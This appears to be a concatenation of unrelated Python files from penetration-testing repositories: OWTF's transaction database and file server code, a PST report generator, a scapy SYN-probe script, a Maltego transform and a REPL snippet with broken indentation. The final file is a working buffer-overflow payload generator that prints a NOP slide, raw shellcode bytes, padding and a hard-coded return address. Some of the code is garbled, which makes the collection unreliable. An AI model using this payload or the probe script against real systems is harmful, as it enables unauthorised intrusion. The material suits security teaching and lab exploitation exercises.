        fout.write("Count,Sender\n")
        for e in sender_list.most_common():
            if len(e) > 1:
                # Sender lines retain their trailing newline, ending the row.
                fout.write(str(e[1]) + "," + str(e[0]))
    html_report_list = []
    for e in sender_list.most_common(5):
        html_report_list.append({"label": str(e[0]), "count": str(e[1])})
    return html_report_list
def dateReport():
    """
    The dateReport function writes date information in a TSV report. No input args as the filename
    is static within the HTML dashboard

    Rows are (weekday 1..7, hour 1..24, count), read from the module-global
    ``date_list`` accumulated by folderReport().

    :return: None
    """
    csv_out = open(makePath("heatmap.tsv"), 'w')
    csv_out.write("day\thour\tvalue\n")
    for date, hours_list in enumerate(date_list):
        for hour, count in hours_list.items():
            to_write = str(date+1) + "\t" + str(hour) + "\t" + str(count) + "\n"
            csv_out.write(to_write)
        csv_out.flush()
    csv_out.close()
def HTMLReport(report_title, pst_name, top_words, top_senders):
    """
    The HTMLReport function generates the HTML report from a Jinja2 Template

    :param report_title: A string representing the title of the report
    :param pst_name: A string representing the file name of the PST
    :param top_words: A list of the top 10 words
    :param top_senders: A list of the top 10 senders
    :return: None
    """
    # Context managers close both files deterministically (the original left
    # the template handle open and relied on GC for the report handle).
    with open("stats_template.html", 'r') as template_in:
        html_template = jinja2.Template(template_in.read())
    context = {"report_title": report_title, "pst_name": pst_name,
               "word_frequency": top_words, "percentage_by_sender": top_senders}
    new_html = html_template.render(context)
    with open(makePath(report_title + ".html"), 'w') as html_report_file:
        html_report_file.write(new_html)
if __name__ == "__main__":
    # Script entry point: parse CLI args, prepare output/log dirs, run main().
    # NOTE(review): ArgumentParser(version=...) is Python 2-era argparse; it
    # raises TypeError on Python 3 -- confirm the target interpreter.
    parser = argparse.ArgumentParser(version=str(__version__), description=__description__,
                                     epilog='Developed by ' + __author__ + ' on ' + __date__)
    parser.add_argument('PST_FILE', help="PST File Format from Microsoft Outlook")
    parser.add_argument('OUTPUT_DIR', help="Directory of output for temporary and report files.")
    parser.add_argument('--title', help='Title of the HTML Report. (default=PST Report)',
                        default="PST Report")
    parser.add_argument('-l', help='File path of log file.')
    args = parser.parse_args()
    output_directory = os.path.abspath(args.OUTPUT_DIR)
    if not os.path.exists(output_directory):
        os.makedirs(output_directory)
    # Log either into the supplied directory or the working directory.
    if args.l:
        if not os.path.exists(args.l):
            os.makedirs(args.l)
        log_path = os.path.join(args.l, 'pst_indexer.log')
    else:
        log_path = 'pst_indexer.log'
    logging.basicConfig(filename=log_path, level=logging.DEBUG,
                        format='%(asctime)s | %(levelname)s | %(message)s', filemode='a')
    logging.info('Starting PST_Indexer v.' + str(__version__))
    logging.debug('System ' + sys.platform)
    logging.debug('Version ' + sys.version)
    logging.info('Starting Script...')
    main(args.PST_FILE, args.title)
    logging.info('Script Complete')
owtf | """
owtf.files.main
~~~~~~~~~~~~~~~
"""
import logging
import tornado
import tornado.httpserver
import tornado.ioloop
import tornado.options
from owtf.files.routes import HANDLERS
from owtf.settings import FILE_SERVER_LOG, FILE_SERVER_PORT, SERVER_ADDR, TEMPLATES
from owtf.utils.app import Application
__all__ = ["start_file_server"]
class FileServer():

    def start(self):
        """Build the tornado application, bind the configured port/address and
        start accepting connections. Startup failures are logged, not raised.
        """
        try:
            self.application = Application(
                handlers=HANDLERS, template_path=TEMPLATES, debug=False, gzip=True
            )
            self.server = tornado.httpserver.HTTPServer(self.application)
            self.server.bind(int(FILE_SERVER_PORT), address=SERVER_ADDR)
            log_args = [
                "dummy_arg",
                "--log_file_prefix={}".format(FILE_SERVER_LOG),
                "--logging=info",
            ]
            tornado.options.parse_command_line(args=log_args)
            self.server.start()
        except Exception as e:
            logging.error(e)
def start_file_server():
    """Module entry point: create a FileServer and start it."""
    FileServer().start()
| 25.783784 | 110 | 0.654545 |
owtf | """
owtf.managers.transaction
~~~~~~~~~~~~~~~~~~~~~~~~~
The DB stores HTTP transactions, unique URLs and more.
"""
import base64
from collections import defaultdict
import json
import logging
import re
from hrt.interface import HttpRequestTranslator
from sqlalchemy import asc, desc
from owtf.config import config_handler
from owtf.db.session import get_count, get_scoped_session
from owtf.transactions.base import HTTPTransaction
from owtf.lib.exceptions import InvalidParameterType, InvalidTransactionReference
from owtf.managers.target import target_required
from owtf.managers.url import import_processed_url
from owtf.models.grep_output import GrepOutput
from owtf.models.transaction import Transaction
from owtf.utils.strings import get_header_list, str2bool
# The regex find differs for these types :P
REGEX_TYPES = ["HEADERS", "BODY"]
@target_required
def num_transactions(session, scope=True, target_id=None):
    """Return number of transactions in scope by default

    :param scope: In/out scope
    :type scope: `bool`
    :param target_id: ID of the target
    :type target_id: `int`
    :return: Number of transactions in scope
    :rtype: `int`
    """
    query = session.query(Transaction).filter_by(scope=scope, target_id=target_id)
    return get_count(query)
@target_required
def is_transaction_already_added(session, criteria, target_id=None):
    """Checks if the transaction is already in the DB

    :param criteria: Filter criteria
    :type criteria: `dict`
    :param target_id: Target ID
    :type target_id: `int`
    :return: True/False
    :rtype: `bool`
    """
    matches = get_all_transactions(session, criteria, target_id=target_id)
    return bool(matches)
def transaction_gen_query(session, criteria, target_id, for_stats=False):
    """Generate query based on criteria

    When ``criteria["search"]`` is set, string fields are matched with SQL
    LIKE (substring search); otherwise fields are matched exactly (filter).
    List-valued criteria are collapsed to their first element in search mode
    and used with IN() in filter mode.

    :param criteria: Filter criteria
    :type criteria: `dict`
    :param target_id: Target ID
    :type target_id: `int`
    :param for_stats: True/False
    :type for_stats: `bool`
    :return:
    :rtype:
    """
    query = session.query(Transaction).filter_by(target_id=target_id)
    # If transaction search is being done
    if criteria.get("search", None):
        if criteria.get("url", None):
            if isinstance(criteria.get("url"), list):
                criteria["url"] = criteria["url"][0]
            query = query.filter(
                Transaction.url.like("%%{!s}%%".format(criteria["url"]))
            )
        if criteria.get("method", None):
            if isinstance(criteria.get("method"), list):
                criteria["method"] = criteria["method"][0]
            query = query.filter(
                Transaction.method.like("%%{!s}%%".format(criteria.get("method")))
            )
        if criteria.get("data", None):
            if isinstance(criteria.get("data"), list):
                criteria["data"] = criteria["data"][0]
            query = query.filter(
                Transaction.data.like("%%{!s}%%".format(criteria.get("data")))
            )
        if criteria.get("raw_request", None):
            if isinstance(criteria.get("raw_request"), list):
                criteria["raw_request"] = criteria["raw_request"][0]
            query = query.filter(
                Transaction.raw_request.like(
                    "%%{!s}%%".format(criteria.get("raw_request"))
                )
            )
        if criteria.get("response_status", None):
            if isinstance(criteria.get("response_status"), list):
                criteria["response_status"] = criteria["response_status"][0]
            query = query.filter(
                Transaction.response_status.like(
                    "%%{!s}%%".format(criteria.get("response_status"))
                )
            )
        if criteria.get("response_headers", None):
            if isinstance(criteria.get("response_headers"), list):
                criteria["response_headers"] = criteria["response_headers"][0]
            query = query.filter(
                Transaction.response_headers.like(
                    "%%{!s}%%".format(criteria.get("response_headers"))
                )
            )
        if criteria.get("response_body", None):
            if isinstance(criteria.get("response_body"), list):
                criteria["response_body"] = criteria["response_body"][0]
            # Body search only makes sense for textual (non-binary) responses.
            query = query.filter(
                Transaction.binary_response is False,
                Transaction.response_body.like(
                    "%%{!s}%%".format(criteria.get("response_body"))
                ),
            )
    else: # If transaction filter is being done
        if criteria.get("url", None):
            if isinstance(criteria.get("url"), str):
                query = query.filter_by(url=criteria["url"])
            if isinstance(criteria.get("url"), list):
                query = query.filter(Transaction.url.in_(criteria.get("url")))
        if criteria.get("method", None):
            if isinstance(criteria.get("method"), str):
                query = query.filter_by(method=criteria["method"])
            if isinstance(criteria.get("method"), list):
                query = query.filter(Transaction.method.in_(criteria.get("method")))
        if criteria.get("data", None):
            if isinstance(criteria.get("data"), str):
                query = query.filter_by(data=criteria["data"])
            if isinstance(criteria.get("data"), list):
                query = query.filter(Transaction.data.in_(criteria.get("data")))
    # For the following section doesn't matter if filter/search because
    # it doesn't make sense to search in a boolean column :P
    if criteria.get("scope", None):
        if isinstance(criteria.get("scope"), list):
            criteria["scope"] = criteria["scope"][0]
        query = query.filter_by(scope=str2bool(criteria["scope"]))
    if criteria.get("binary_response", None):
        if isinstance(criteria.get("binary_response"), list):
            criteria["binary_response"] = criteria["binary_response"][0]
        query = query.filter_by(binary_response=str2bool(criteria["binary_response"]))
    if not for_stats: # query for stats shouldn't have limit and offset
        try:
            query.order_by(Transaction.local_timestamp)
            if criteria.get("offset", None):
                if isinstance(criteria.get("offset"), list):
                    criteria["offset"] = int(criteria["offset"][0])
                if criteria["offset"] >= 0:
                    query = query.offset(criteria["offset"])
            if criteria.get("limit", None):
                if isinstance(criteria.get("limit"), list):
                    criteria["limit"] = int(criteria["limit"][0])
                if criteria["limit"] >= 0:
                    query = query.limit(criteria["limit"])
            else: # It is too dangerous without a limit argument
                query.limit(10) # Default limit value is 10
        except ValueError:
            raise InvalidParameterType("Invalid parameter type for transaction db")
    return query
@target_required
def get_first(session, criteria, target_id=None):
    """Assemble only the first transaction that matches the criteria from DB

    :param criteria: Filter criteria
    :type criteria: `dict`
    :param target_id: Target ID
    :type target_id: `int`
    :return:
    :rtype:
    """
    matching = transaction_gen_query(session, criteria, target_id)
    return get_transaction(matching.first())
@target_required
def get_all_transactions(session, criteria, target_id=None):
    """Assemble ALL transactions that match the criteria from DB

    :param criteria: Filter criteria
    :type criteria: `dict`
    :param target_id: target ID
    :type target_id: `int`
    :return: list of OWTF transactions
    :rtype: `list`
    """
    matching = transaction_gen_query(session, criteria, target_id)
    return get_transactions(matching.all())
def get_transaction(trans):
    """Fetch transaction from the DB

    :param trans: OWTF transaction
    :type trans: :`Class:transaction.HTTP_Transaction`
    :return: HTTPTransaction populated from the DB row, or None
    :rtype: HTTPTransaction or None
    """
    if trans:
        owtf_transaction = HTTPTransaction(None)
        response_body = trans.response_body
        if trans.binary_response:
            # Binary bodies are stored base64-encoded (see
            # get_transaction_model); decode back to raw bytes.
            response_body = base64.b64decode(response_body)
        owtf_transaction.set_transaction_from_db(
            trans.id,
            trans.url,
            trans.method,
            trans.response_status,
            str(trans.time),
            trans.time_human,
            trans.local_timestamp,
            trans.data,
            trans.raw_request,
            trans.response_headers,
            len(response_body),
            response_body,
        )
        return owtf_transaction
    return None
def get_transactions(transactions):
    """Convert multiple DB rows into OWTF transactions

    :param transactions: List of transaction model objects
    :type transactions: `list`
    :return: List of OWTF transactions
    :rtype: `list`
    """
    converted = []
    for row in transactions:
        if row is not None:
            converted.append(get_transaction(row))
    return converted
def get_transaction_model(transaction):
    """Generate object to be added to the DB

    :param transaction: OWTF transaction
    :type transaction: `Class:transaction.HTTP_Transaction`
    :return: Transaction object
    :rtype: `Class:model.Transaction`
    """
    response_body = None
    binary_response = None
    try:
        # NOTE(review): .encode("utf-8") normally raises UnicodeEncodeError,
        # not UnicodeDecodeError. The handler below only fires when the body
        # is a byte string being implicitly decoded first (Python 2
        # semantics) -- confirm this still behaves as intended on Python 3.
        response_body = transaction.get_raw_response_body.encode("utf-8")
        binary_response = False
    except UnicodeDecodeError:
        # Binary payloads are stored base64-encoded and flagged, so they can
        # be decoded symmetrically in get_transaction().
        response_body = base64.b64encode(transaction.get_raw_response_body)
        binary_response = True
    finally:
        transaction_model = Transaction(
            url=transaction.url,
            scope=transaction.in_scope,
            method=transaction.method,
            data=transaction.data,
            time=float(transaction.time),
            time_human=transaction.time_human,
            local_timestamp=transaction.local_timestamp,
            raw_request=transaction.get_raw_request,
            response_status=transaction.get_status,
            response_headers=transaction.get_response_headers,
            response_body=response_body,
            response_size=len(response_body) if response_body is not None else 0,
            binary_response=binary_response,
            session_tokens=json.dumps(transaction.get_session_tokens()),
        )
    return transaction_model
@target_required
def log_transactions(session, transaction_list, target_id=None):
    """This function does the following things in order

    + Add all transactions to a session and commit
    + Add all the grepped results and commit
    + Add all urls to url db

    :param transaction_list: List of transaction objects
    :type transaction_list: `list`
    :param target_id: target ID
    :type target_id: `int`
    :return:
    :rtype:
    """
    # Create a usable session
    # Initiate urls_list for holding urls and transaction_model_list for holding transaction models
    urls_list = []
    transaction_model_list = []
    # Add transactions and commit so that we can have access to
    # transaction ids etc..
    for transaction_obj in transaction_list:
        # TODO: This shit will go crazy on non-ascii characters
        transaction_model = get_transaction_model(transaction_obj)
        transaction_model.target_id = target_id
        transaction_model_list.append(transaction_model)
        session.add(transaction_model)
        urls_list.append([transaction_obj.url, True, transaction_obj.in_scope])
    session.commit()
    # Now since we have the ids ready, we can process the grep output and
    # add accordingly. So iterate over transactions and their
    for i, obj in enumerate(transaction_list):
        # Get the transaction and transaction model from their lists
        owtf_transaction = transaction_list[i]
        transaction_model = transaction_model_list[i]
        # Check if grepping is valid for this transaction
        # For grepping to be valid
        # + Transaction must not have a binary response
        # + Transaction must be in scope
        if (not transaction_model.binary_response) and (transaction_model.scope):
            # Get the grep results
            grep_outputs = grep_transaction(owtf_transaction)
            if grep_outputs: # If valid grep results exist
                # Iterate over regex_name and regex results
                for regex_name, regex_results in grep_outputs.items():
                    # Then iterate over the results to store each result in
                    # a separate row, but also check to avoid duplicate
                    # entries as we have many-to-many relationship
                    # available for linking
                    for match in regex_results:
                        # Convert the match to json
                        match = json.dumps(match)
                        # Fetch if any existing entry
                        existing_grep_output = session.query(GrepOutput).filter_by(
                            target_id=target_id, name=regex_name, output=match
                        ).first()
                        if existing_grep_output:
                            # Link this transaction to the already-stored match.
                            existing_grep_output.transactions.append(transaction_model)
                            session.merge(existing_grep_output)
                        else:
                            session.add(
                                GrepOutput(
                                    target_id=target_id,
                                    transactions=[transaction_model],
                                    name=regex_name,
                                    output=match,
                                )
                            )
    session.commit()
    import_processed_url(session=session, urls_list=urls_list, target_id=target_id)
def log_transactions_from_logger(transactions_dict):
    """Logs transactions as they come into the DB

    .. note::
        Transaction_dict is a dictionary with target_id as key and list of owtf transactions

    :param transactions_dict: Dict of target id and corresponding owtf transactions
    :type transactions_dict: `dict`
    :return: None
    :rtype: None
    """
    session = get_scoped_session()
    for target_id, transactions in list(transactions_dict.items()):
        if not transactions:
            continue
        log_transactions(
            session=session, transaction_list=transactions, target_id=target_id
        )
@target_required
def delete_transaction(session, transaction_id, target_id=None):
    """Deletes transaction from DB

    :param transaction_id: transaction ID
    :type transaction_id: `int`
    :param target_id: target ID
    :type target_id: `int`
    :return: None
    :rtype: None
    """
    matching = session.query(Transaction).filter_by(
        target_id=target_id, id=transaction_id
    )
    matching.delete()
    session.commit()
@target_required
def get_num_transactions_inscope(target_id=None):
    """Gets number of transactions in scope

    :param target_id: target ID
    :type target_id: `int`
    :return: Number of transactions in scopes
    :rtype: `int`
    """
    # NOTE(review): num_transactions() declares ``session`` as its first
    # positional parameter but none is passed here -- presumably the
    # @target_required decorator supplies it; confirm, otherwise this call
    # raises TypeError.
    return num_transactions(target_id=target_id)
def get_transaction_by_id(id):
    """Get transaction object by id

    :param id: ID to fetch
    :type id: `int`
    :return: Transaction object, or None when *id* is not numeric or no
        such transaction exists
    :rtype: `Class:model.Transaction` or None
    """
    session = get_scoped_session()
    try:
        trans_id = int(id)
    except (ValueError, TypeError):
        # Non-numeric id: keep the original "no such transaction" contract.
        # (TypeError covers e.g. id=None, which the old finally-return also
        # swallowed.)
        return None
    # BUG FIX: the original returned from a ``finally`` block, which silently
    # suppressed *every* exception raised in the try body (including DB
    # errors from the query); only the int() conversion is expected to fail.
    return session.query(Transaction).get(trans_id) # None if no such transaction.
def get_transactions_by_id(id_list):
    """Get transactions by id list

    :param id_list: List of ids
    :type id_list: `list`
    :return: List of transaction objects
    :rtype: `list`
    """
    # Look up each id and drop the ones that did not resolve to a row.
    found = [obj for obj in (get_transaction_by_id(i) for i in id_list) if obj]
    return get_transactions(found)
@target_required
def get_top_by_speed(session, order="Desc", num=10, target_id=None):
    """Get top transactions by speed

    :param order: Ascending/descending order
    :type order: `str`
    :param num: Num of transactions to fetch
    :type num: `int`
    :param target_id: target ID
    :type target_id: `int`
    :return: List of transactions
    :rtype: `list`
    """
    # "Desc" sorts slowest-first; anything else sorts fastest-first.
    direction = desc if order == "Desc" else asc
    results = (
        session.query(Transaction)
        .filter_by(target_id=target_id)
        .order_by(direction(Transaction.time))
        .limit(num)
    )
    return get_transactions(results)
def compile_header_regex(header_list):
    """Build a case-insensitive regex matching any of the given header names
    followed by ": <value up to CR>".

    :param header_list: List of header name strings
    :type header_list: `list`
    :return: compiled regex with two groups (header name, header value)
    """
    alternatives = "|".join(header_list)
    pattern = "({0}): ([^\r]*)".format(alternatives)
    return re.compile(pattern, re.IGNORECASE)
def compile_response_regex(regexp):
    """Compile *regexp* case-insensitively with DOTALL so '.' also matches
    newlines in response bodies.

    :param regexp: Regex
    :type regexp: `str`
    :return: compiled regex
    """
    flags = re.IGNORECASE | re.DOTALL
    return re.compile(regexp, flags)
def compile_regex():
    """General function for getting and compiling regexes

    Populates the module-global ``regexes`` dict from the framework config:
    keys starting with HEADERS become header regexes, keys starting with
    RESPONSE become body regexes.

    :return: None
    :rtype: None
    """
    # NOTE(review): get_framework_config_dict is accessed without parentheses,
    # so it is presumably a property on config_handler -- confirm.
    for key in list(config_handler.get_framework_config_dict.keys()):
        key = key[3:-3] # Remove "@@@"
        if key.startswith("HEADERS"):
            header_list = get_header_list(key)
            regexes["HEADERS"][key] = compile_header_regex(header_list)
        elif key.startswith("RESPONSE"):
            # Config value format: "<x>_____<y>_____<python regex>".
            _, _, python_regexp = config_handler.get_val(key).split("_____")
            regexes["BODY"][key] = compile_response_regex(python_regexp)
def grep_transaction(owtf_transaction):
    """Run every configured header and body regex against *owtf_transaction*
    and merge the per-regex match dictionaries into one result.

    :param owtf_transaction: OWTF transaction
    :return: Output
    :rtype: `dict`
    """
    merged = {}
    for name, pattern in list(regexes["HEADERS"].items()):
        merged.update(grep_response_headers(name, pattern, owtf_transaction))
    for name, pattern in list(regexes["BODY"].items()):
        merged.update(grep_response_body(name, pattern, owtf_transaction))
    return merged
def grep_response_body(regex_name, regex, owtf_transaction):
    """Grep the raw response body of *owtf_transaction* with *regex*.

    :param regex_name: Regex name
    :type regex_name: `str`
    :param regex: compiled regex
    :param owtf_transaction: OWTF transaction
    :return: Output
    :rtype: `dict`
    """
    body = owtf_transaction.get_raw_response_body
    return grep(regex_name, regex, body)
def grep_response_headers(regex_name, regex, owtf_transaction):
    """Grep the response headers of *owtf_transaction* with *regex*.

    :param regex_name: Name of regex
    :type regex_name: `str`
    :param regex: compiled regex
    :param owtf_transaction: OWTF transaction
    :return: Output
    :rtype: `dict`
    """
    headers = owtf_transaction.get_response_headers
    return grep(regex_name, regex, headers)
def grep(regex_name, regex, data):
    """Apply *regex* to *data*.

    :param regex_name: Name of regex
    :type regex_name: `str`
    :param regex: compiled regex
    :param data: Data
    :type data: `str`
    :return: {regex_name: matches} when anything matched, else an empty dict
    :rtype: `dict`
    """
    matches = regex.findall(data)
    if not matches:
        return {}
    return {regex_name: matches}
@target_required
def search_by_regex_name(session, regex_name, stats=False, target_id=None):
    """Allows searching of the grep_outputs table using a regex name

    .. note::
        What this function returns :
        + regex_name
        + grep_outputs - list of unique matches
        + transaction_ids - list of one transaction id per unique match
        + match_percent

    :param regex_name: Name of regex
    :type regex_name: `str`
    :param stats: true/false
    :type stats: `bool`
    :param target_id: target ID
    :type target_id: `int`
    :return: List of results
    :rtype: `list`
    """
    # Get the grep outputs and only unique values
    grep_outputs = session.query(GrepOutput.output).filter_by(
        name=regex_name, target_id=target_id
    ).group_by(
        GrepOutput.output
    ).all()
    grep_outputs = [i[0] for i in grep_outputs]
    # Get one transaction per match
    transaction_ids = []
    for grep_output in grep_outputs:
        # First transaction id linked to this unique match.
        transaction_ids.append(
            session.query(Transaction.id).join(Transaction.grep_outputs).filter(
                GrepOutput.output == grep_output, GrepOutput.target_id == target_id
            ).limit(
                1
            ).all()[
                0
            ][
                0
            ]
        )
    # Calculate stats if needed
    if stats:
        # Calculate the total number of matches
        num_matched_transactions = get_count(
            session.query(Transaction).join(Transaction.grep_outputs).filter(
                GrepOutput.name == regex_name, GrepOutput.target_id == target_id
            ).group_by(
                Transaction
            )
        )
        # Calculate total number of transactions in scope
        num_transactions_in_scope = get_count(
            session.query(Transaction).filter_by(scope=True, target_id=target_id)
        )
        # Calculate matched percentage
        if int(num_transactions_in_scope):
            match_percent = int(
                (num_matched_transactions / float(num_transactions_in_scope)) * 100
            )
        else:
            match_percent = 0
    else:
        match_percent = None
    # Matches were stored JSON-encoded (see log_transactions); decode here.
    return [
        regex_name,
        [json.loads(i) for i in grep_outputs],
        transaction_ids,
        match_percent,
    ]
@target_required
def search_by_regex_names(name_list, stats=False, target_id=None):
    """Allows searching of the grep_outputs table using a regex name

    .. note::
        What this function returns is a list of list containing
        + regex_name
        + grep_outputs - list of unique matches
        + transaction_ids - list of one transaction id per unique match
        + match_percent

    :param name_list: List of names
    :type name_list: `list`
    :param stats: True/false
    :type stats: `bool`
    :param target_id: target ID
    :type target_id: `int`
    :return: List of matched ids
    :rtype: `list`
    """
    session = get_scoped_session()
    return [
        search_by_regex_name(session, name, stats=stats, target_id=target_id)
        for name in name_list
    ]
def get_transaction_dicts(tdb_obj_list, include_raw_data=False):
    """Serialize each transaction object via its ``to_dict()`` method.

    :param tdb_obj_list: List of transaction objects
    :type tdb_obj_list: `list`
    :param include_raw_data: true/false to include raw transactions
    :type include_raw_data: `bool`
    :return: List of transaction dicts
    :rtype: `list`
    """
    dicts = []
    for tdb_obj in tdb_obj_list:
        dicts.append(tdb_obj.to_dict(include_raw_data))
    return dicts
@target_required
def search_all_transactions(session, criteria, target_id=None, include_raw_data=True):
    """Search all transactions.Three things needed

    + Total number of transactions
    + Filtered transaction dicts
    + Filtered number of transactions

    :param criteria: Filter criteria
    :type criteria: `dict`
    :param target_id: target ID
    :type target_id: `int`
    :param include_raw_data: True/False to include raw data
    :type include_raw_data: `bool`
    :return: Results
    :rtype: `dict`
    """
    total = get_count(session.query(Transaction).filter_by(target_id=target_id))
    matching_objs = transaction_gen_query(session, criteria, target_id).all()
    # Count without limit/offset so pagination does not skew the number.
    matching_count = get_count(
        transaction_gen_query(session, criteria, target_id, for_stats=True)
    )
    return {
        "records_total": total,
        "records_filtered": matching_count,
        "data": get_transaction_dicts(matching_objs, include_raw_data),
    }
@target_required
def get_all_transactions_dicts(
    session, criteria, target_id=None, include_raw_data=False
):
    """Assemble ALL transactions that match the criteria from DB.

    :param criteria: Filter criteria
    :type criteria: `dict`
    :param target_id: target ID
    :type target_id: `int`
    :param include_raw_data: True/False as to include raw data
    :type include_raw_data: `bool`
    :return: List of transaction dicts
    :rtype: `list`
    """
    # BUG FIX: get_all_transactions() already returns a *list* of transaction
    # objects (it calls .all() internally), so the previous code's second
    # ``query.all()`` raised AttributeError. Query the model objects directly
    # and serialize them, mirroring search_all_transactions().
    transaction_objs = transaction_gen_query(session, criteria, target_id).all()
    return get_transaction_dicts(transaction_objs, include_raw_data)
@target_required
def get_by_id_as_dict(session, trans_id, target_id=None):
    """Get transaction dict by ID

    :param trans_id: Transaction ID
    :type trans_id: `int`
    :param target_id: Target ID
    :type target_id: `int`
    :return: transaction object as dict
    :rtype: `dict`
    :raises InvalidTransactionReference: when no such transaction exists
    """
    transaction_obj = (
        session.query(Transaction)
        .filter_by(target_id=target_id, id=trans_id)
        .first()
    )
    if transaction_obj is None:
        raise InvalidTransactionReference(
            "No transaction with {!s} exists".format(trans_id)
        )
    return transaction_obj.to_dict(include_raw_data=True)
@target_required
def get_hrt_response(session, filter_data, trans_id, target_id=None):
    """Converts the transaction and calls hrt

    :param filter_data: Filter data
    :type filter_data: `dict`
    :param trans_id: Transaction ID
    :type trans_id: `int`
    :param target_id: Target ID
    :type target_id: `int`
    :return: Converted code
    :rtype: `string`
    :raises InvalidTransactionReference: when no such transaction exists
    """
    transaction_obj = session.query(Transaction).filter_by(
        target_id=target_id, id=trans_id
    ).first()
    # Data validation
    languages = ["bash"] # Default script language is set to bash.
    if filter_data.get("language"):
        languages = [x.strip() for x in filter_data["language"]]
    proxy = None
    search_string = None
    data = None
    if filter_data.get("proxy"):
        proxy = filter_data["proxy"][0]
    if filter_data.get("search_string"):
        search_string = filter_data["search_string"][0]
    if filter_data.get("data"):
        data = filter_data["data"][0]
    # If transaction not found. Raise error.
    if not transaction_obj:
        raise InvalidTransactionReference(
            "No transaction with {!s} exists".format(trans_id)
        )
    raw_request = transaction_obj.raw_request
    try:
        hrt_obj = HttpRequestTranslator(
            request=raw_request,
            languages=languages,
            proxy=proxy,
            search_string=search_string,
            data=data,
        )
        codes = hrt_obj.generate_code()
        return "".join(codes.values())
    except Exception as e:
        # BUG FIX: the placeholder was the literal "$s", so the exception text
        # never reached the log; use lazy "%s" formatting instead.
        logging.error("Unexpected exception when running HRT: %s", str(e))
        return str(e)
# Module-level registry: regex category ("HEADERS"/"BODY") -> {name: compiled
# regex}. Note the defaultdict(list) default factory is never used -- both
# category keys are immediately re-bound to plain dicts below.
regexes = defaultdict(list)
for regex_type in REGEX_TYPES:
    regexes[regex_type] = {}
# Populate the registry from the framework config at import time.
compile_regex()
| 32.62762 | 99 | 0.614426 |
Python-Penetration-Testing-Cookbook | from scapy.all import *
from pprint import pprint

# Craft a batch of TCP SYN probes: one packet per (destination, port) combo.
ethernet = Ether()
# Three destinations: a hostname and two LAN addresses.
network = IP(dst = ['rejahrehim.com', '192.168.1.1', '192.168.1.2'])
# transport = TCP(dport=53, flags = 'S')
# (53, 100) expands to every destination port from 53 through 100.
transport = TCP(dport=[(53, 100)], flags = 'S')
packet = ethernet/network/transport
# pprint(packet)
# pprint([pkt for pkt in packet])
# Iterating the layered template yields each concrete packet; show() dumps
# its full field breakdown.
for pkt in packet:
    # ls(pkt)
    pkt.show()
cybersecurity-penetration-testing | import urllib2
import urllib2
from bs4 import BeautifulSoup
import sys
import time

# Maltego local transform: fetch the target page and emit every anchor as a
# maltego.Domain entity wrapped in a MaltegoTransformResponseMessage.
tarurl = sys.argv[1]
# Normalise the target URL: strip a single trailing slash.
if tarurl.endswith("/"):
    tarurl = tarurl[:-1]
print("<MaltegoMessage>")
print("<MaltegoTransformResponseMessage>")
print(" <Entities>")
url = urllib2.urlopen(tarurl).read()
soup = BeautifulSoup(url)
for line in soup.find_all('a'):
    newline = line.get('href')
    if newline is None:
        # Anchors without an href would crash the slicing below.
        continue
    if newline[:4] == "http":
        # Absolute link: emit as-is.
        print("<Entity Type=\"maltego.Domain\">")
        print("<Value>" + str(newline) + "</Value>")
        print("</Entity>")
    elif newline[:1] == "/":
        # Relative link: emit joined to the target base URL.
        # (BUG FIX: the original had a dangling bare ``if`` here -- a syntax
        # error -- so the relative-link entity was never emitted.)
        combline = tarurl + newline
        print("<Entity Type=\"maltego.Domain\">")
        print("<Value>" + str(combline) + "</Value>")
        print("</Entity>")
print(" </Entities>")
print("</MaltegoTransformResponseMessage>")
print("</MaltegoMessage>")
Hands-On-Penetration-Testing-with-Python | >>> import multiprocessing
>>> def process_me(id):
... print("Process " +str(id))
...
>>> for i in range(5):
... p=multiprocessing.Process(target=process_me,args=(i,))
... p.start()
>>> Process 0
>>> Process 1
>>> Process 2
>>> Process 3
>>> Process 4
import multiprocessing as mp
>>> class a(mp.Process):
... def __init__(self):
...         mp.Process.__init__(self)
... def run(self):
... print("Process started")
...
>>> obj=a()
>>> obj.start()
| 21.636364 | 62 | 0.539235 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
# Payload generator (Python 2): emits [NOP slide][shellcode][padding][return
# address] totalling payload_length bytes, for piping into the vulnerable
# binary's stdin.
## Total payload length
payload_length = 424
## Amount of nops
nop_length = 100
## Controlled memory address to return to in Little Endian format.
# Candidate addresses observed in the debugger across runs:
#0x7fffffffddc0
#0x7fffffffe120
#current 0x7fffffffdf80: 0xffffdfa0
#0x7fffffffdde0
#return_address = '\x20\xe1\xff\xff\xff\x7f\x00\x00'
# NOTE: the chosen value overwrites the saved return slot at $rsp.
#00007fffffffde30
# The address used is the contents of register r9 (where the shellcode
# lands), verified with a debugger. This approach only works because ASLR
# is disabled, so r9 is stable across consecutive runs; if it changes,
# look for a "jmp r9" gadget instead.
return_address = '\x30\xde\xff\xff\xff\x7f\x00\x00' #oreg
# NOTE(review): this second assignment overrides the one above -- the
# earlier value is dead code. Confirm which address is intended.
return_address = '\xf0\xdd\xff\xff\xff\x7f\x00\x00'
# Original author's note: payload generation was still suspect at this point.
## Building the nop slide
nop_slide = "\x90" * nop_length
## Malicious code injection (shellcode bytes, msfvenom-style chunks)
buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xfa\x6e\x99\x49\xdc\x75\xa8"
buf += "\x43\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x90\x47\xc1\xd0\xb6\x77\xf7\x29\xfb\x30\x96\x4c\x94"
buf += "\xe2\xe0\xfa\xf8\x6e\x88\x15\xa3\x75\xa8\x42\xab\x26"
buf += "\x10\xaf\xb6\x65\xf2\x29\xd0\x36\x96\x4c\xb6\x76\xf6"
buf += "\x0b\x05\xa0\xf3\x68\x84\x7a\xad\x36\x0c\x04\xa2\x11"
buf += "\x45\x3d\x13\x6c\x98\x07\xf7\x66\xaf\x1d\xa8\x10\xb2"
buf += "\xe7\x7e\x1b\x8b\x3d\x21\xa5\xf5\x6b\x99\x49\xdc\x75"
buf += "\xa8\x43"
## Building the padding between buffer overflow start and return address
padding = 'B' * (payload_length - nop_length - len(buf))
print nop_slide + buf + padding + return_address
cybersecurity-penetration-testing | #!/usr/bin/python
